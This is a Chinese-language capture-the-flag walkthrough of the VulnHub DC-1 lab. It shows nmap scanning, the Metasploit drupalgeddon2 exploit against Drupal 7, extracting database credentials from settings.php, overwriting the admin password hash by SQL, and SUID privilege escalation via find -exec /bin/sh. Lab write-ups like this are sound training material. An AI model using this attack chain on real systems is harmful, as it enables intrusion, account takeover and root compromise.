DC-1靶场下载链接:https://download.vulnhub.com/dc/DC-1.zip
目标
本机IP:192.168.118.128
靶机IP:192.168.118.0/24
信息收集
通过nmap扫存活主机,得到目标ip,扫出其端口信息及服务
nmap -sP 192.168.118.0/24
nmap -p- 192.168.118.138
nmap -sV -A 192.168.118.138
这里得到其发放了22端口以及80端口
首先访问一下他的web服务:http://192.168.118.138
这里发现一个登录框,首先想到的肯定得是SQL注入了呗,简单尝试以后,行不通
然后此web页面也再没有其他信息
接下来简单收集一下其web指纹,这里使用 whatweb
这里可以看到其CMS框架是 Drupal 7 版本
MSF漏洞利用
先直接使用MSF探查一下漏洞
这里发现有众多漏洞,在选择漏洞是首先考虑版本最相近的,不然就一个一个尝试吧,这里我最后选择“1”漏洞
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.118.138
run这里发现payload已经设置好,可以得到shell,设置好相关漏洞,直接运行
浅浅shell一下,然后使用Python方法实现交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
flag1
ls一下,看到flag1.txt ,快快打开查看内容
得到 flag1,重要信息应该就是这个CMS的配置文件,接下来我们就得找这个配置文件了
发现是settings.php,在sites/default/files中,在刚在的文件中,记得是有sites这个文件的,直接进去查看此配置文件
flag2
发现里面有flag2,它好像作用也不是很大,但在下面有了详细的数据库信息,还是个mysql,账号密码就这样诱惑着我,那就连接呗
mysql -u dbuser -p R0ck3t然后就是在数据库中找一找我们想要的信息了
这里就是一步步找出敏感信息,我就直接给出结果了
show databases;
use drupaldb;
show tables;
select * from users\G;
这里找到了两个用户的信息,看着复杂的密码,尝试了解密,没有任何效果
接下来我们就有两个思路吧,修改密码或者添加新用户
百度参考drupal数据库存放用户密码的加密脚本文件,直接就找到了:/var/www/scripts/password-hash.sh
那应该这个密码就是hash加密了吧,那接下来就修改密码吧
首先我们生成出123456的hash
php scripts/password-hash.sh 123456
我们重新进入数据库,将admin的密码替换为这个加密后的hash
update drupaldb.users set pass="$S$DBdjFBevhOwTeP.UcmRJMfef2lfNMPYS3ykCOaG2UKTkE2gCEAiL" where name='admin';重新查看用户信息,密码修改成功
接下来我们重新登录刚开始web页面,使用刚修改好的账号密码登录( admin :123456)
OK,登录进去了,最终在里面成功找到 flag3
flag3
里面说的大概是让我去找passwd和shadow之类的
passwd里面存放的是一般是用户信息一些的,进去查看一下
cat /etc/passwd
发现里面出现了flag4,后面给出了一个路径,尝试进去查看一下,最终得到了flag4
flag4
falg4里面的信息大概意思是说要得到 root 权限,才能得到 flag
SUID提权
那下一步就是提权了,结合前面找到的信息,应该是SUID提权
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
以上三条命令都可以查看到具有SUID权限的文件
find 提权
提权过程:创建一个名为aaa文件夹,尝试在 aaa 目录下执行 /bin/bash 命令
find 命令结合 -exec 参数来执行不同的命令
-exec:对匹配的文件执行该参数所给出的shell命令
touch aaa
find aaa -exec "/bin/sh" \; 提权成功
thefinalflag
cd到root目录下,最终得到 thefinalflag
